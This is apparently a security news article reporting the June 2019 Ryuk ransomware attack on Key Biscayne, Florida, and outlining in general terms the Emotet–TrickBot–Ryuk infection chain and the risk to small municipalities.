The Key Biscayne ransomware attack marks the third attack on a Florida city in just a month. According to city officials, a “data security event” occurred on Sunday, June 23, 2019. IT professionals working for the city decided to take systems offline in an abundance of caution.
The initial compromise occurred when a city employee clicked a malicious attachment in an email.
This latest ransomware attack comes just weeks after the attacks on Riviera Beach and Lake City.
Initial investigations of the city’s systems revealed traces of the Ryuk ransomware. Ryuk is a powerful piece of malware first discovered in August of 2018. This particular piece of malware is often the final piece of a ‘Triple Threat’ attack.
Triple Threat Malware: A Powerful Chain
In a Triple Threat attack an initial phishing email delivers a malicious attachment. This attachment executes a Powershell script when opened, and downloads the Emotet trojan. Emotet is a banking trojan but is also capable of downloading other components. In this case, attackers used Emotet as a downloader for the main payload, the TrickBot trojan.
TrickBot is a powerful trojan that is used to monitor the victim’s networks before deploying the Ryuk ransomware. This allows the attackers to encrypt the most critical systems and increase the chances of their victims paying the ransom. TrickBot also includes many tools for lateral movement in a victim’s network. This includes password harvesters and exploits for vulnerabilities such as BlueKeep. In fact there are an estimated 800,000 systems still vulnerable to BlueKeep.
Security researchers commonly attribute the Ryuk malware to the North Korean “Lazarus” group. Lately however, the same malware has been used by non-state criminal operators for profit.
Small municipalities face significant risk
The Key Biscayne ransomware attack is just one of many ransomware attacks on municipalities. The increasing frequency of such attacks goes to highlight the importance of an effective human firewall.
Key Biscayne has an estimated 3,000 residents officially making it a village. Attackers are increasingly targeting small municipalities like this as their IT infrastructure is often less protected.
At this time it is unknown if city officials have decided to pay the ransom, or restore systems from backups.